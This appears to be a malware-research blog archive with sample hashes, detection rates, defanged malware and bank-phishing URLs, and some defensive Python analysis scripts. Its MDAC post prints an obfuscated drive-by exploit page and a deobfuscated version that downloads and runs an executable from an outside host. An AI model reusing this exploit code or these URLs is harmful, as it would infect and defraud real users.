Archive for the 'Malware Distribution' Category

13 Nov

Database Update - 16 Files (Low-Moderate Detection)

Another update for tonight. Should have more over the weekend. Find them in /pnuemo-malware/.

BE ADVISED: These URLs may still be active. Proceed at your own risk!

services.exe
Result: 19/36 (52.78%)
MD5: c629db60a9a5d7303419b5153d3e9b0b
VirusTotal
ThreatExpert Analysis

nd82m0.dll
Result: 5/36 (13.89%)
MD5: d6f2135dc562c7d4992cf2cea2166707
VirusTotal
ThreatExpert Analysis
hxxp://85.17.166.182

kb600179.dll
Result: 5/36 (13.89%)
MD5: f946f8c3de445d45c7eb34591bee037b
VirusTotal
ThreatExpert Analysis
hxxp://89.188.16.30

setup_457_6777_.exe
Result: 1/36 (2.78%)
MD5: e9339f9045368947789ec70739de4b21
VirusTotal
ThreatExpert Analysis
hxxp://files.download-antispyware.com

scanner_457_6777_.exe
Result: 16/36 (44.44%)
MD5: e0f855c6c5fc93f0a8ed1fe9e702e492
VirusTotal
ThreatExpert Analysis
hxxp://dl.storage-antispyware.com/get/

42.exe
Result: 4/36 (11.12%)
MD5: f5201b9e77b7b31443b4e0e6190e219f
VirusTotal
ThreatExpert Analysis
hxxp://85.92.157.141/mxlivemedia/

msansspc.dll
Result: 6/36 (16.67%)
MD5: 3cc545e42b9bb14df4a63f2a37aebdb0
VirusTotal
ThreatExpert Analysis

mvnzivtlmzhxi.dll
Result: 7/36 (19.45%)
MD5: 7614e7448f1983b9641e9699f67576a4
VirusTotal
ThreatExpert Analysis

pdf.pdf
Result: 6/36 (16.67%)
MD5: a3f83503a165a19c4b01328463175cd7
VirusTotal
hxxp://activision.cc/1/spl

twext.exe
Result: 11/36 (30.56%)
MD5: 5767c816cb20753976df2edb60eaf448
VirusTotal
ThreatExpert Analysis

load.exe
Result: 12/36 (33.34%)
MD5: 9b467bdc6dd1b3e68651b7039cd373c8
VirusTotal
ThreatExpert Analysis
hxxp://activision.cc/1/

xcvb.pdf
Result: 4/36 (11.12%)
MD5: e3b86145de00ebfab3e3159d24b81104
VirusTotal
hxxp://91.203.92.137/xcv/

install.exe
Result: 16/36 (44.45%)
MD5: 0869881865032bd1b3b08d82e5e4f404
VirusTotal
ThreatExpert Analysis
hxxp://91.203.92.137/xcv/

beep.sys & figaro.sys
Result: 29/36 (80.56%)
MD5: c4618f889863b5aa357f5f5ba8f353d6
VirusTotal
ThreatExpert Analysis

brastk.exe
Result: 14/36 (38.89%)
MD5: 0d63a88fdb4259de8280f8bb7d78ec35
VirusTotal
ThreatExpert Analysis

KB908268.exe
Result: 7/36 (19.45%)
MD5: 504eb66e741186a61792862f0a83ff82
VirusTotal
ThreatExpert Analysis
hxxp://76.74.239.143/weruoiq/

12 Nov

EstDomains shut down effective November 24th, 2008

I thought it was worth noting that today ICANN finally decided to terminate EstDomains' ability to register domains. EstDomains has long turned a blind eye to its clients' use of its services, and shutting down some, if not all, of the domains it registered will definitely help slow the spread of some new malware. The gangs, I'm sure, have already planned for this and have started moving some of their operations.

The termination of ICANN-accredited registrar EstDomains is to go ahead, effective 24 November 2008.

On 28 October 2008, ICANN sent a notice of termination to EstDomains, Inc. (EstDomains) based on an Estonian Court record reflecting the conviction of EstDomains’ then president, Vladimir Tsastsin, of credit card fraud, money laundering and document forgery.

Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, “Any officer or director of [a] Registrar is convicted of a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances.”

ICANN received a response from EstDomains on 29 October in which it indicated that the Estonian Court record on which ICANN relied was not final and had been appealed. ICANN pended the termination of EstDomains’ RAA to analyze the claims made by EstDomains and to obtain independent information regarding the status of the alleged appeal.

On 7 November 2008, EstDomains was informed that, based on ICANN’s findings, ICANN was proceeding with the termination of EstDomains’ RAA, effective 24 November 2008.

ICANN’s records indicate that EstDomains manages approximately 281,000 domain names. To protect the interests of registrants, on 28 October 2008, ICANN published a Request for Information seeking expressions of interest from registrars to receive a bulk transfer of the domain names managed by de-accredited registrar EstDomains.

ICANN is analyzing the responses to that request and will take measures to effectuate a smooth transition of the domain names managed by EstDomains to a qualified ICANN-accredited registrar.

Courtesy of ICANN

25 Oct

Ocean Bank phishing/malware distribution through fake SSL certificate

Found another phishing/malware distribution scheme, this time targeting Ocean Bank. Like the ones we’ve seen in the past, it pushes a file to download (Oceanmultissl.exe) that the page claims is an SSL certificate needed for security purposes; it is an executable, not a certificate. As you’ll see below there are quite a few URLs pushing this malware, and the ones listed are just a fraction of the total. Once the file is run it fetches s.exe, which in turn drops a kernel driver (new_drv.sys) that functions as a rootkit. The sample is available in /pnuemo-malware/.

BE ADVISED: These URLs may still be active. Proceed at your own risk.

Oceanmultissl.exe (Downloads or Creates: s.exe)
Result: 21/34 (61.77%)
MD5: c4906f64d0ea19dab7a9e7626ee40781
VirusTotal
ThreatExpert Analysis

s.exe & 9129837.exe (Downloads or Creates: 9129837.exe & new_drv.sys)
Result: 18/36 (50%)
MD5: d951f3a8e3485c3c150ba17c0f53db86
VirusTotal
ThreatExpert Analysis

new_drv.sys
Result: 34/36 (94.45%)
MD5: a54de1d46ff7bdefbf9d9284c1916c5e
VirusTotal
ThreatExpert Analysis

Name servers for the domains below:
ns1.domensinter.com
ns2.domensinter.com

hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.siteminderagent.verification.0wylzehgk.edfrkti.com/103541.html?/renewmirror/verification
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.siteminderagent.demystifying.1vzohkwd0.edfrkti.com/103541.html?/ptcontrol/services
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.procedure.gnyit07m8.edfrkti.com/103541.html?/onlineupdate/rnalid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.portalserver.jdv6kcukz.ceuewys.com/103541.html?/comreportid/onlineupdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.portalserver.ifzsgwhsm.edfrkti.com/103541.html?/customerlogin/comservlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.bankonenet.9sxkghaq8.gineehg.com/103541.html?/viewcontent/rnalid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.renewmirror.mnskscirl.ceuewys.com/103541.html?/sitesurvey/encrypted
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.ptcontrol.jcpptbgdz.ceuewys.com/103541.html?/procedure/actionvalidate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.carehtmlclient.lg3qhifus.ceuewys.com/103541.html?/memberverify/onlineupdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.servletdologin.bankonenet.aldz11d6n.gineehg.com/103541.html?/bankonenet/bankonline
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.services.rnalid.gyomouftr.reueys.com/103541.html?/securitychallenge/memberverify
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.services.portalserver.fkquawuv8.ceuewys.com/103541.html?/verification/exacttrget
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.selfservice.servletdologin.jgu801sal.edfrkti.com/103541.html?/servletdologin/bankonenet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.securitychallenge.certificateupdate.dpf29qakc.edfrkti.com/103541.html?/bankonline/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.rnalid.portalserver.rczkjzpmm.reuybso.com/103541.html?/memberverify/procedure
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.rnalid.onlineupdatemirror.pqwzbc38r.reueys.com/103541.html?/communitypage/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.slapiservlet.kjlxlurym.gineehg.com/103541.html?/certificateUpdate/carehtmlclient
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.demystifying.kululslhk.edfrkti.com/103541.html?/cfmasternbank/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.comreportid.0hbfmxry5.reueys.com/103541.html?/configlogin/selfservice
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.renewmirror.bankonenet.jrbks5mu1.reueys.com/103541.html?/demystifying/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.sessionervlet.zsbtlddf1.gineehg.com/103541.html?/doexte/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.ptcontrol.e9s82vmjo.edfrkti.com/103541.html?/ptcontrol/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.productsremote.uj8mqt7af.edfrkti.com/103541.html?/carehtmlclient/verification
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.portalserver.uhdirryyz.edfrkti.com/103541.html?/services/comreportid
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.ptcontrol.bankonline.xfadkkfg9.reueys.com/103541.html?/services/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.onlineupdatemirror.hia3rhicq.edfrkti.com/103541.html?/linkbrowse/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.exacttrget.sl1iyagjp.reueys.com/103541.html?/comservlet/communitypage
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.demystifying.ebulerhz1.reuybso.com/103541.html?/linkbrowse/selfservice
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.privatelogin.carehtmlclient.m0fz6fjtp.reuybso.com/103541.html?/customerlogin/configlogin
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.renewmirror.e4s0uhfhb.edfrkti.com/103541.html?/communitypage/comservlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.exacttrget.mkcxdf604.reueys.com/103541.html?/onlineupdatemirror/portalserver
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.portalserver.communitypage.f3lg1sydw.edfrkti.com/103541.html?/carehtmlclient/demystifying
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.onlineupdate.services.bodkqha20.edfrkti.com/103541.html?/communitypage/carehtmlclient
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.memberverify.certificateupdate.h5sfn919q.gineehg.com/103541.html?/exacttrget/sessionervlet
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.linkbrowse.privatelogin.ehe2hxod6.edfrkti.com/103541.html?/privatelogin/services
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.exacttrget.demystifying.djzxt6l3z.edfrkti.com/103541.html?/bankonenet/portalserver
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.encrypted.siteminderagent.oit17c3jq.edfrkti.com/103541.html?/sessionervlet/certificateUpdate
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.demystifying.rnalid.p7jzbwnji.gineehg.com/103541.html?/renewmirror/sitesurvey
hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.demystifying.ptcontrol.utqnl5dg0.ceuewys.com/103541.html?/exacttrget/privatelogin

14 Oct

M&I Bank Malware/Phishing Websites

There is a campaign to spread malware through fake M&I Bank websites. The malware these pages try to install (MIbankcertificate.exe) was featured in today’s database update and can be accessed through /pnuemo-malware/MIbankcertificate.zip in our repository.

A screenshot of the site was included with this post; below is a list of some of the domains hosting these pages. Luckily both Firefox and Internet Explorer flagged these as suspicious pages.


hxxp://businessportal.mibank.mibusinessonlinebanking.qzbpkh9in1q7mzd.bankonenet.services.wlienex.com/subsections.htm?/actionvalidate/onlineupdate/OSL.htm?LOB=3163895149&refer=bpkH9iN1Q7mzDrZ
hxxp://businessportal.mibank.mibusinessonlinebanking.sybzjefp95juuqd.bankonline.configlogin.bineeo.com/subsections.htm?/viewcontent/privatelogin/OSL.htm?LOB=0820757379&refer=bZjEFP95juuQd8T
hxxp://businessportal.mibank.mibusinessonlinebanking.hgt7nxvcm13ieqf.renewmirror.siteminderagent.sddgus.com/subsections.htm?/carehtmlclient/bankonline/OSL.htm?LOB=6355552810&refer=T7nXvCm13IEqfNX
hxxp://businessportal.mibank.mibusinessonlinebanking.4xgbf1wlvys8xl4.doexte.linkbrowse.sddgus.com/subsections.htm?/actionvalidate/ptcontrol/OSL.htm?LOB=5425746488&refer=gbf1WlVyS8xl4Xg
hxxp://businessportal.mibank.mibusinessonlinebanking.sb0pryfloi89guq.renewmirror.productsremote.bineeo.com/subsections.htm?/doexte/exacttrget/OSL.htm?LOB=8754725917&refer=0PrYFloI89GuQAR
hxxp://businessportal.mibank.mibusinessonlinebanking.ibxtphpk5roeojr.comservlet.servletdologin.bineeo.com/subsections.htm?/procedure/privatelogin/OSL.htm?LOB=5359068295&refer=XTPHPk5rOEOJrK4
hxxp://businessportal.mibank.mibusinessonlinebanking.9cl3xftk4ni9t9t.servletdologin.ptcontrol.bineeo.com/subsections.htm?/onlineupdate/configlogin/OSL.htm?LOB=1831421831&refer=L3Xftk4nI9T9tv5
hxxp://businessportal.mibank.mibusinessonlinebanking.ynqcyrmfqwjt2st.bankonenet.comreportid.bueozia.com/subsections.htm?/bankonline/customerlogin/OSL.htm?LOB=2678391850&refer=QCyrmFqWJt2stbY
hxxp://businessportal.mibank.mibusinessonlinebanking.j880s7k6hjwpqsz.onlineupdate.onlineupdate.bueozia.com/subsections.htm?/configlogin/customerlogin/OSL.htm?LOB=2783087268&refer=80S7k6HjwpQSzmp
hxxp://businessportal.mibank.mibusinessonlinebanking.4vlhcq1ray5plj8.securitychallenge.configlogin.sddgus.com/subsections.htm?/verification/encrypted/OSL.htm?LOB=1963750084&refer=lhCQ1RAy5Plj8qn
hxxp://businessportal.mibank.mibusinessonlinebanking.w4kjtij48tuycyg.bankonenet.carehtmlclient.bueozia.com/subsections.htm?/cfmasternbank/doexte/OSL.htm?LOB=7399944416&refer=kJtij48TUYCYgR6
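Added example, not code from the original posts: a short Python script run over hostnames from the Ocean Bank and M&I Bank lists above. In both campaigns the bank name sits in the leftmost labels, the registered domain (edfrkti.com, wlienex.com and so on) is a throwaway, and every host in a campaign shares the same path. The script pulls out the registered domain, flags hosts where the bank name appears only in the subdomain, groups them by the domain you would actually block or report, and counts the shared paths. The six URLs are copied from the lists; the www.oceanbank.com control is constructed, the BRANDS tuple is an assumption, and the two-label rule for the registered domain is a simplification (a real tool would use the Public Suffix List).

```python
from collections import Counter, defaultdict
from urllib.parse import urlsplit

# Sample input: six URLs copied from the Ocean Bank and M&I Bank lists above
# (defanged hxxp:// kept as in the posts), plus one constructed benign control.
SAMPLE_URLS = [
    "hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.siteminderagent.verification.0wylzehgk.edfrkti.com/103541.html?/renewmirror/verification",
    "hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.sessionervlet.portalserver.jdv6kcukz.ceuewys.com/103541.html?/comreportid/onlineupdate",
    "hxxp://oceanbank.webcashmgmt.wcmfd.wcmpw.services.rnalid.gyomouftr.reueys.com/103541.html?/securitychallenge/memberverify",
    "hxxp://businessportal.mibank.mibusinessonlinebanking.qzbpkh9in1q7mzd.bankonenet.services.wlienex.com/subsections.htm?/actionvalidate/onlineupdate/OSL.htm?LOB=3163895149&refer=bpkH9iN1Q7mzDrZ",
    "hxxp://businessportal.mibank.mibusinessonlinebanking.sybzjefp95juuqd.bankonline.configlogin.bineeo.com/subsections.htm?/viewcontent/privatelogin/OSL.htm?LOB=0820757379&refer=bZjEFP95juuQd8T",
    "hxxp://businessportal.mibank.mibusinessonlinebanking.hgt7nxvcm13ieqf.renewmirror.siteminderagent.sddgus.com/subsections.htm?/carehtmlclient/bankonline/OSL.htm?LOB=6355552810&refer=T7nXvCm13IEqfNX",
    "hxxp://www.oceanbank.com/login",  # constructed control: brand IS the registered domain
]

# Brand keywords to look for in host names (assumption: the two banks from the posts)
BRANDS = ("oceanbank", "mibank")


def refang(url):
    """Turn the blog's hxxp:// defanging back into a parseable scheme."""
    return url.replace("hxxp://", "http://", 1).replace("hxxps://", "https://", 1)


def registered_domain(host):
    """Last two labels. Good enough for .com; use the Public Suffix List for co.uk etc."""
    return ".".join(host.lower().split(".")[-2:])


def analyze(url):
    parts = urlsplit(refang(url))
    host = parts.hostname
    labels = host.split(".")
    reg = registered_domain(host)
    # Brand keyword in the subdomain labels but not in the registered domain
    brand_in_sub = any(b in label for label in labels[:-2] for b in BRANDS)
    brand_in_reg = any(b in reg for b in BRANDS)
    return {
        "host": host,
        "registered_domain": reg,
        "path": parts.path,
        "label_count": len(labels),
        "suspicious": brand_in_sub and not brand_in_reg,
    }


def suspicious_by_domain(urls):
    """Group flagged hosts by the throwaway registered domain: the thing to block or report."""
    out = defaultdict(list)
    for u in urls:
        a = analyze(u)
        if a["suspicious"]:
            out[a["registered_domain"]].append(a["host"])
    return dict(out)


def shared_paths(urls):
    """Paths reused across many hosts are a better pivot than any single host name."""
    return Counter(a["path"] for a in map(analyze, urls) if a["suspicious"])


if __name__ == "__main__":
    for dom, hosts in suspicious_by_domain(SAMPLE_URLS).items():
        print(dom, hosts)
    print(shared_paths(SAMPLE_URLS))
```

The point of grouping by registered domain rather than by full hostname is that the random label (0wylzehgk, qzbpkh9in1q7mzd) changes on every URL, so a hostname blocklist is useless; the registered domain and the reused path are what stay constant.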

14 Oct

Database Update - 9 Files (Low-Moderate Detection)

Here is a fresh round of new malware. All files are available under /pnuemo-malware/ in our repository.

BE ADVISED: These domains may still be active. Proceed at your own risk!

MIbankcertificate.exe (Downloads or creates: 9129837.exe, new_drv.sys & s.exe)
Result: 6/36 (16.67%)
MD5: 6a5c95ca74f538155b36bb8146920e3b
VirusTotal
ThreatExpert Analysis
hxxp://businessportal.mibank.mibusinessonlinebanking.ytb4odaguh6n7ga.rnalid.carehtmlclient.mdwiers.com

s.exe & 9129837.exe
Result: 4/36 (11.12%)
MD5: 7b09e457f412bf841e04d37658e678db
VirusTotal
ThreatExpert Analysis
hxxp://lodnew.com

new_drv.sys
Result: 33/36 (91.67%)
MD5: a54de1d46ff7bdefbf9d9284c1916c5e
VirusTotal
Sunbelt Sandbox

zcodec.1067.exe
Result: 9/36 (25%)
MD5: e288a47163d936343ca3f7c36d07c08b
VirusTotal
ThreatExpert Analysis
hxxp://codecdownload.funsoft-enjoyportal.com

setup_110144_3_.exe
Result: 4/36 (11.12%)
MD5: 92c50bb6ad9c7edd923cd1ac82a9ccdd
VirusTotal
ThreatExpert Analysis
hxxp://files.pc-security-downloads.com

b156.exe (Downloads or creates: Twain.exe)
Result: 14/36 (38.89%)
MD5: 05411d4f5b6a3b430dcd30bea1731362
VirusTotal
ThreatExpert Analysis
hxxp://dl2.bundlext.com:8080

Twain.exe
Result: 16/36 (44.45%)
MD5: 13d526cefcef5d5f9e49baf7c56dd5db
VirusTotal
Sunbelt Sandbox

keygen.Cool.Burning.Studio.3.1c30 (Downloads or creates: 30980.exe)
Result: 8/36 (22.23%)
MD5: a136a6370f9d9cef72cf1e3563bace00
VirusTotal
ThreatExpert Analysis
hxxp://city-codec.net/download

30980.exe
Result: 9/36 (25%)
MD5: 5f2b7907b87f7000938aa9cd17cdcd0f
VirusTotal
ThreatExpert Analysis

11 Oct

Fake PornTube websites installing malware (Revisited)

More and more fake PornTube websites are appearing these days. They are planted on unsuspecting web servers running vulnerable software, usually uploaded through SQL injection. Here is another look at these fake sites.

BE ADVISED: The URLs listed may still be live. Proceed at your own risk. Files available in /pnuemo-malware/.

The user is sent to an initial page that immediately redirects to a second page, which is the same on every site:

hxxp://domain.com/index1.php -> hxxp://domain.com/index14.php

Continue reading ‘Fake PornTube websites installing malware (Revisited)’

04 Oct

MDAC Exploit Page (iexplorer.exe)

We discovered another exploit page that drops malware onto the visitor's computer through a vulnerability in MDAC. The initial page is loaded with obfuscated code. Deobfuscated, it instantiates the RDS.DataSpace ActiveX control (CLSID BD96C556-65A3-11D0-983A-00C04FC29E36, the MDAC flaw patched in MS06-014), uses it to create MSXML2.XMLHTTP, ADODB.Stream and Shell.Application objects, fetches the loader page (load.php), writes the response to disk as iexplorer.exe and executes it. Everything is wrapped in try/catch, so on a patched browser the page fails silently and the meta refresh sends the visitor to a 404 after three seconds. Below is the exploit page, its deobfuscated form, and the malware information. The binary has very few real detections; most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404">
<script language=JavaScript>
str = "ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(: {`e/rdu@uushctud)&he&-&{`e&(: {`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(: usx!z w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(: w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(: w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(: usx!z!u/uxqd!<!0: p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(: p/rdoe)(:!u/nqdo)(: u/Vshud)p/sdrqnordCnex(: w`s!o`ld!<!&/..//..hdyqmnsds/dyd&: u/R`wdUnGhmd)o`ld-3(: u/Bmnrd)(: |!b`ubi)d(!z| usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z|| b`ubi)d(z||";
str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);
</script></head></html>

XORing each character with 1 (the loop after the string) deobfuscates it to the following. Inside str, the gaps between statements, rendered as spaces above, are non-printing bytes that XOR to a line break; a real space would decode to "!", which would not parse.

start();
function start() {
  var zad = document.createElement('object');
  zad.setAttribute('id','zad');
  // clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 = RDS.DataSpace (MDAC)
  zad.setAttribute('classid','cl'+'si'+"d:BD"+"96C5"+'56-65A3-1'+"1D0-98"+'3A-00'+"C04"+'FC2'+"9E"+'36');
  try {
    var q = zad.CreateObject('ms'+"xm"+'l2'+"."+'XM'+"LH"+'T'+'TP','');      // msxml2.XMLHTTP
    var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",'');          // Shell.Application
    var t = zad.CreateObject('ad'+'od'+"b."+'st'+"re"+'am','');            // adodb.stream
    try { t.type = 1;                                                    // binary stream
      q.open('G'+"E"+'T','http://gavai-pegc9.ws/Gpack/load.php',false);
      q.send(); t.open();
      t.Write(q.responseBody);
      var name = './/..//iexplorer.exe';
      t.SaveToFile(name,2);                                              // 2 = overwrite
      t.Close();
    } catch(e) {}
    try { s.shellexecute(name); } catch(e) {}
  } catch(e){}
}

hxxp://gavai-pegc9.ws/Gpack/load.php serves the malware binary, which the script saves as iexplorer.exe and launches through Shell.Application.
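Added example, not code from the original post or from the Gpack kit: a Python deobfuscator for this page. It reads the XOR key out of the decoder stub, decodes the string, folds the split-up string concatenations so the CLSID and ProgIDs become readable, and pulls out the indicators (CLSID, ProgIDs, download URL, dropped file name). The embedded string is the one shown above. Assumption: the blog renders the byte between statements as a space, but a space XOR 1 is "!" and would not parse, so the real byte must XOR to a line break; 0x0b (vertical tab) is used here.

```python
import re

# The XOR-1 payload from the Gpack page above, one statement per list entry.
# The separator byte is assumed to be 0x0b: 0x0b ^ 1 == 0x0a ("\n"), which is
# what the deobfuscated listing shows; a space would decode to "!".
OBFUSCATED = "\x0b".join([
    "ru`su)(:",
    "gtobuhno!ru`su)(!z",
    "w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(:",
    "{`e/rdu@uushctud)&he&-&{`e&(:",
    "{`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:",
    "usx!z",
    "w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:",
    "w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:",
    "w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:",
    "usx!z!u/uxqd!<!0:",
    "p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(:",
    "p/rdoe)(:!u/nqdo)(:",
    "u/Vshud)p/sdrqnordCnex(:",
    "w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:",
    "u/R`wdUnGhmd)o`ld-3(:",
    "u/Bmnrd)(:",
    "|!b`ubi)d(!z|",
    "usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||",
    "b`ubi)d(z||",
])

# The decoder stub that follows the string on the page; the key is read from it.
DECODER_STUB = ('str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + '
                'String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);')


def xor_key(stub):
    """Pull the constant N out of a fromCharCode(str.charCodeAt(i) ^ N) decoder."""
    m = re.search(r"charCodeAt\s*\(\s*\w+\s*\)\s*\^\s*(\d+)", stub)
    if not m:
        raise ValueError("no charCodeAt(...) ^ N pattern found")
    return int(m.group(1))


def xor_decode(s, key):
    return "".join(chr(ord(c) ^ key) for c in s)


# A single-quoted or double-quoted JS string literal (no escapes handled).
STR_LIT = r"""(?:'([^'\\]*)'|"([^"\\]*)")"""
CONCAT = re.compile(STR_LIT + r"\s*\+\s*" + STR_LIT)


def fold_concats(js):
    """Join 'a'+"b" chains into one literal so split CLSIDs and ProgIDs are readable.
    Regex based: fine for kit output like this, not a general JS parser."""
    def join(m):
        left = m.group(1) if m.group(1) is not None else m.group(2)
        right = m.group(3) if m.group(3) is not None else m.group(4)
        return "'" + left + right + "'"
    prev = None
    while prev != js:
        prev, js = js, CONCAT.sub(join, js)
    return js


GUID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"


def extract_iocs(js):
    """Indicators worth recording from the folded script."""
    return {
        "clsids": sorted(set(re.findall(r"clsid:(" + GUID + ")", js, re.I))),
        "progids": sorted(set(re.findall(r"CreateObject\('([^']+)'", js))),
        "urls": sorted(set(re.findall(r"https?://[^\s'\"]+", js))),
        "dropped": sorted(set(re.findall(r"'([^']*\.(?:exe|dll|sys|scr))'", js, re.I))),
    }


def deobfuscate(obfuscated, stub):
    return fold_concats(xor_decode(obfuscated, xor_key(stub)))


if __name__ == "__main__":
    js = deobfuscate(OBFUSCATED, DECODER_STUB)
    print(js)
    for kind, values in extract_iocs(js).items():
        print(kind, values)
```

Reading the key from the stub rather than hard-coding 1 matters because the same kit ships the same loader with different keys; folding the concatenations is what turns the eleven fragments into a CLSID you can actually search for.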

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

07 Sep

Malspam: Notices from IRS (taxform_for_print.scr)

Here is a piece of malspam we received that purports to be from the IRS, telling you that you are due a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr. Note the .scr extension: a Windows screen saver is an ordinary executable, so "printing the form" runs the malware.

taxform_for_print.scr
Result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
VirusTotal
ThreatExpert Analysis

06 Sep

QuickTime exploit page installs msupd_0809_upd070148.exe (VIDEO)


Here is an example of an exploit page. It checks the browser for certain vulnerable QuickTime plug-in objects; if one is found, it exploits the object, drops the malware on the computer and executes it. We recorded a video of the website exploiting QuickTime and installing the malware on the system (at the bottom of the post). The binary is available in /pnuemo-malware/ in our repository; see the FAQ for access. As usual, proceed at your own risk, because the links are still live as of this post date. One thing worth mentioning: the site logs your IP address, so on subsequent visits you’ll get a 404.

This post is very long because of the code within the page, so to read everything, make sure to read more.

hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/

<script language=JavaScript>function f1(z0){var i,j,ff=0xff,z9=0xc,b=0x400,
r,z7=3,s=0,z8="ss",w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j--){r='';for(i=
Math.min(l,b);i>0;l--,i--){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8="7";z9=w}}y1="document";y2="write";eval(y1+"."+y2+"(r)")}}
